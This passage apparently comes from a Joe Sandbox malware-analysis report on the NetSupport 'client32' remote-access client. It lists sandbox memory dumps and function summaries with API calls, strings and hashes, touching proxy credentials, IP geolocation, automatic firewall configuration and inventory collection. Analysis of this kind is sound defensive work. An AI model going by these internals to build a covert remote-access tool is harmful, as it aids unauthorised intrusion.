Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
API String ID: 3298063328-2190704750
Opcode ID: 3b59737b017a528acb193203f0270af2f5a2ea3ef6b731abf40abcba2d20a93b
Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
Opcode Fuzzy Hash: 3b59737b017a528acb193203f0270af2f5a2ea3ef6b731abf40abcba2d20a93b
Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52

Function 68C733A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 68C734FD
wsprintfA.USER32 ref: 68C73727

Strings

ProxyUsername, xrefs: 68C736E0
P, xrefs: 68C73533
Gateway, xrefs: 68C73577
%s:%s, xrefs: 68C73721
Gateway_WebProxy, xrefs: 68C7359D
ProxyCred, xrefs: 68C7362A
client247, xrefs: 68C7362F
*GatewayAddress, xrefs: 68C73430
*PINServer, xrefs: 68C735C4
Gateway_UseWebProxy, xrefs: 68C73585
:%d, xrefs: 68C734F7
*WebProxy, xrefs: 68C73459
PinProxy, xrefs: 68C735ED
ProxyPassword, xrefs: 68C736F7
*UseWebProxy, xrefs: 68C7343C
UsePinProxy, xrefs: 68C735D0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
API String ID: 2111968516-2157635994
Opcode ID: 37837b3d5c04c067bbad8a6225ccf8baa3ebce05d51d2ff37a0f23241adc9ff9
Instruction ID: 1ee4c276edbb587dd9fb6087671515d8825a947e959f99841a0a7d3d8f72ac2e
Opcode Fuzzy Hash: 37837b3d5c04c067bbad8a6225ccf8baa3ebce05d51d2ff37a0f23241adc9ff9
Instruction Fuzzy Hash: 4F22B2B2A00268AFDF20CF64CC90EEEB3B9AB4A314F8485D9E55967540EA315FC58F51

Function 11084F50 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,62C07B5E,025D77F0,025D77E0,?,00000000,1117ED9C,000000FF,?,11031392,025D77F0,00000000,?,?,?), ref: 11084F85

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7765C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
wsprintfA.USER32 ref: 1108505B
wsprintfA.USER32 ref: 11085072
wsprintfA.USER32 ref: 11085089
CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA

Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,774CF550,?,?,11085200,?,11031392,025D77F0,00000000,?,?,?), ref: 11084BD8
Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,774CF550,?,?,11085200,?,11031392,025D77F0,00000000,?,?,?), ref: 11084BEB
Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,774CF550,?,?,11085200,?,11031392,025D77F0,00000000,?,?,?), ref: 11084BFE
Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,774CF550,?,?,11085200,?,11031392,025D77F0,00000000,?,?,?), ref: 11084C11

Strings

%s_HF.%s, xrefs: 11085083
Cancel, xrefs: 11084FB9
GetInventoryEx, xrefs: 11084FC7
%s_SW.%s, xrefs: 1108506C
GetInventory, xrefs: 11084FA5
PCIINV.DLL, xrefs: 11084F80
%s_HW.%s, xrefs: 11085052

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 3281479988-2492245516
Opcode ID: e79e8737a57767a360234bba90a97f9ccf4e5079ef7247a1568b48b9923ce02a
Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
Opcode Fuzzy Hash: e79e8737a57767a360234bba90a97f9ccf4e5079ef7247a1568b48b9923ce02a
Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91

Function 1102FF34 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 176synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D

Strings

istaUI, xrefs: 1102FF8F
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1102FFB0
/247, xrefs: 11030098
_debug\tracefile, xrefs: 1102FFDB
_debug\trace, xrefs: 1102FFCA
SetProcessDPIAware, xrefs: 11030103
PCIMutex, xrefs: 11030064, 11030083

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: 3419b364451b030f4c1ae17ea76cb3df227c77bbc6b46c8a377cef6aa527b1dd
Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
Opcode Fuzzy Hash: 3419b364451b030f4c1ae17ea76cb3df227c77bbc6b46c8a377cef6aa527b1dd
Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62

Function 11027E10 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

wsprintfA.USER32 ref: 11027E84
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
wsprintfA.USER32 ref: 11027F01
CloseHandle.KERNEL32(?), ref: 11027F17
CloseHandle.KERNEL32(?), ref: 11027F20
LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95

Strings

pcicl32_res.dll, xrefs: 11027F59
SetClientResLang called, gPlatform %x, xrefs: 11027E2C
", xrefs: 11027E5A
Locales\%d\, xrefs: 11027EF1
Setting resource langid=%d, xrefs: 11027F41
\GetUserLang.exe", xrefs: 11027E7E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-1744591295
Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0

Function 1105F4E0 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,62C07B5E), ref: 1105F575

Strings

WARNING: *NOT* Sending EV_CONFIGSET from %s@%d, xrefs: 1105F9A5
cfg %x: Set [%s]%s=%s, xrefs: 1105F7F8
..\ctl32\Config.cpp, xrefs: 1105F815, 1105F92F, 1105F96C, 1105F9A0
(NULL), xrefs: 1105F7DD, 1105F7F4
idata->hCurrConfig, xrefs: 1105F81A
err == 0, xrefs: 1105F934
Send EV_CONFIGSET from %s@%d, xrefs: 1105F971

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterSection
String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$WARNING: *NOT* Sending EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s$err == 0$idata->hCurrConfig
API String ID: 1904992153-2291704020
Opcode ID: f75fd7559a39da90d8c55802e1ee1893f5f43811e71498e4db1733a3353841c2
Instruction ID: 7aff06277d8664bd47fe24daf387b215d76634cef051db57f0aa4e34213ea8d6
Opcode Fuzzy Hash: f75fd7559a39da90d8c55802e1ee1893f5f43811e71498e4db1733a3353841c2
Instruction Fuzzy Hash: 7ED1C575D0026A9BDB96CF24CC80BE9B7F9BF48704F0441DCE959A7240E774AB84CB92

Function 1102C030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
GetTickCount.KERNEL32 ref: 1102C09A

Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A

GetTickCount.KERNEL32 ref: 1102C194

Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB

Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
CloseHandle.KERNEL32(?), ref: 1102C2A8

Strings

LatLong, xrefs: 1102C058, 1102C145
GetLatLong=%s, took %d ms, xrefs: 1102C1B1
?IP=%s, xrefs: 1102C126
GeoIP, xrefs: 1102C0E3
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102C2D9, 1102C2ED, 1102C301, 1102C315
_debug, xrefs: 1102C0E8, 1102C14A
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102C0B5
IsA(), xrefs: 1102C2DE, 1102C2F2, 1102C306, 1102C31A

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61

Function 11060CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA

Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
RegCloseKey.ADVAPI32(?), ref: 11060E21

Strings

Software\Policies\NetSupport, xrefs: 11060D9F
Client.%04d.%s, xrefs: 11060D87
Client, xrefs: 11060D08, 11060E38
DisableUserPolicies, xrefs: 11060E33
%s\%s\%s\, xrefs: 11060DA4
Software\Policies\NetSupport\Client, xrefs: 11060CF4
Standard, xrefs: 11060D66
Client, xrefs: 11060D9A
Software\Policies\NetSupport\Client\Standard, xrefs: 11060D0D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5

Function 11134AC0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetTickCount.KERNEL32 ref: 11134B22

Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9

GetTickCount.KERNEL32 ref: 11134B31
_memset.LIBCMT ref: 11134B73
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
_strrchr.LIBCMT ref: 11134B98
_free.LIBCMT ref: 11134BEA

Strings

Client, xrefs: 11134AFC
IsICFPresent..., xrefs: 11134B0F
*AutoICFConfig, xrefs: 11134AF7
No ICF present, xrefs: 11134C22
ICFConfig2 returned 0x%x, xrefs: 11134BF0
IsICFPresent() took %d ms, xrefs: 11134B3D
ICFConfig, xrefs: 11134AD5

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

